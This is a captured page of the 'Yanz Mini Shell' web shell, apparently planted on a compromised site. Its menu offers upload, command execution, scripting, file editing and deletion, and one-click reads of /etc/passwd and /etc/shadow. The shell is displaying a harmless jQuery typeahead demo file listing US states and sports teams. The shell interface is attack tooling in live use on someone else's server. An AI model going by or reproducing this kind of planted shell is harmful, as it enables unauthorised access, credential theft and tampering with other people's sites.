Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
sparkline
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
/** * Typeahead (jquery) */ 'use strict'; $(function () { // String Matcher function var substringMatcher = function (strs) { return function findMatches(q, cb) { var matches, substrRegex; matches = []; substrRegex = new RegExp(q, 'i'); $.each(strs, function (i, str) { if (substrRegex.test(str)) { matches.push(str); } }); cb(matches); }; }; var states = [ 'Alabama', 'Alaska', 'Arizona', 'Arkansas', 'California', 'Colorado', 'Connecticut', 'Delaware', 'Florida', 'Georgia', 'Hawaii', 'Idaho', 'Illinois', 'Indiana', 'Iowa', 'Kansas', 'Kentucky', 'Louisiana', 'Maine', 'Maryland', 'Massachusetts', 'Michigan', 'Minnesota', 'Mississippi', 'Missouri', 'Montana', 'Nebraska', 'Nevada', 'New Hampshire', 'New Jersey', 'New Mexico', 'New York', 'North Carolina', 'North Dakota', 'Ohio', 'Oklahoma', 'Oregon', 'Pennsylvania', 'Rhode Island', 'South Carolina', 'South Dakota', 'Tennessee', 'Texas', 'Utah', 'Vermont', 'Virginia', 'Washington', 'West Virginia', 'Wisconsin', 'Wyoming' ]; if (isRtl) { $('.typeahead').attr('dir', 'rtl'); } // Basic // -------------------------------------------------------------------- $('.typeahead').typeahead( { hint: !isRtl, highlight: true, minLength: 1 }, { name: 'states', source: substringMatcher(states) } ); var bloodhoundBasicExample = new Bloodhound({ datumTokenizer: Bloodhound.tokenizers.whitespace, queryTokenizer: Bloodhound.tokenizers.whitespace, local: states }); // Bloodhound Example // -------------------------------------------------------------------- $('.typeahead-bloodhound').typeahead( { hint: !isRtl, highlight: true, minLength: 1 }, { name: 'states', source: bloodhoundBasicExample } ); var prefetchExample = new Bloodhound({ datumTokenizer: Bloodhound.tokenizers.whitespace, queryTokenizer: Bloodhound.tokenizers.whitespace, prefetch: assetsPath + 'json/typeahead.json' }); // Prefetch Example // -------------------------------------------------------------------- $('.typeahead-prefetch').typeahead( { hint: !isRtl, highlight: true, minLength: 1 }, { name: 'states', source: prefetchExample } ); // Render default Suggestions function renderDefaults(q, sync) { if (q === '') { sync(prefetchExample.get('Alaska', 'New York', 'Washington')); } else { prefetchExample.search(q, sync); } } // Default Suggestions // -------------------------------------------------------------------- $('.typeahead-default-suggestions').typeahead( { hint: !isRtl, highlight: true, minLength: 0 }, { name: 'states', source: renderDefaults } ); var customTemplate = new Bloodhound({ datumTokenizer: Bloodhound.tokenizers.obj.whitespace('value'), queryTokenizer: Bloodhound.tokenizers.whitespace, prefetch: assetsPath + 'json/typeahead-data-2.json' }); // Custom Template // -------------------------------------------------------------------- $('.typeahead-custom-template').typeahead(null, { name: 'best-movies', display: 'value', source: customTemplate, highlight: true, hint: !isRtl, templates: { empty: [ '<div class="empty-message p-2">', 'unable to find any Best Picture winners that match the current query', '</div>' ].join('\n'), suggestion: function (data) { return '<div><span class="fw-medium">' + data.value + '</span> – ' + data.year + '</div>'; } } }); var nbaTeams = [ { team: 'Boston Celtics' }, { team: 'Dallas Mavericks' }, { team: 'Brooklyn Nets' }, { team: 'Houston Rockets' }, { team: 'New York Knicks' }, { team: 'Memphis Grizzlies' }, { team: 'Philadelphia 76ers' }, { team: 'New Orleans Hornets' }, { team: 'Toronto Raptors' }, { team: 'San Antonio Spurs' }, { team: 'Chicago Bulls' }, { team: 'Denver Nuggets' }, { team: 'Cleveland Cavaliers' }, { team: 'Minnesota Timberwolves' }, { team: 'Detroit Pistons' }, { team: 'Portland Trail Blazers' }, { team: 'Indiana Pacers' }, { team: 'Oklahoma City Thunder' }, { team: 'Milwaukee Bucks' }, { team: 'Utah Jazz' }, { team: 'Atlanta Hawks' }, { team: 'Golden State Warriors' }, { team: 'Charlotte Bobcats' }, { team: 'Los Angeles Clippers' }, { team: 'Miami Heat' }, { team: 'Los Angeles Lakers' }, { team: 'Orlando Magic' }, { team: 'Phoenix Suns' }, { team: 'Washington Wizards' }, { team: 'Sacramento Kings' } ]; var nhlTeams = [ { team: 'New Jersey Devils' }, { team: 'New York Islanders' }, { team: 'New York Rangers' }, { team: 'Philadelphia Flyers' }, { team: 'Pittsburgh Penguins' }, { team: 'Chicago Blackhawks' }, { team: 'Columbus Blue Jackets' }, { team: 'Detroit Red Wings' }, { team: 'Nashville Predators' }, { team: 'St. Louis Blues' }, { team: 'Boston Bruins' }, { team: 'Buffalo Sabres' }, { team: 'Montreal Canadiens' }, { team: 'Ottawa Senators' }, { team: 'Toronto Maple Leafs' }, { team: 'Calgary Flames' }, { team: 'Colorado Avalanche' }, { team: 'Edmonton Oilers' }, { team: 'Minnesota Wild' }, { team: 'Vancouver Canucks' }, { team: 'Carolina Hurricanes' }, { team: 'Florida Panthers' }, { team: 'Tampa Bay Lightning' }, { team: 'Washington Capitals' }, { team: 'Winnipeg Jets' }, { team: 'Anaheim Ducks' }, { team: 'Dallas Stars' }, { team: 'Los Angeles Kings' }, { team: 'Phoenix Coyotes' }, { team: 'San Jose Sharks' } ]; var nbaExample = new Bloodhound({ datumTokenizer: Bloodhound.tokenizers.obj.whitespace('team'), queryTokenizer: Bloodhound.tokenizers.whitespace, local: nbaTeams }); var nhlExample = new Bloodhound({ datumTokenizer: Bloodhound.tokenizers.obj.whitespace('team'), queryTokenizer: Bloodhound.tokenizers.whitespace, local: nhlTeams }); // Multiple // -------------------------------------------------------------------- $('.typeahead-multi-datasets').typeahead( { hint: !isRtl, highlight: true, minLength: 0 }, { name: 'nba-teams', source: nbaExample, display: 'team', templates: { header: '<h4 class="league-name border-bottom mb-0 mx-3 mt-3 pb-2">NBA Teams</h4>' } }, { name: 'nhl-teams', source: nhlExample, display: 'team', templates: { header: '<h4 class="league-name border-bottom mb-0 mx-3 mt-3 pb-2">NHL Teams</h4>' } } ); });
Free Space : 11677609984 Byte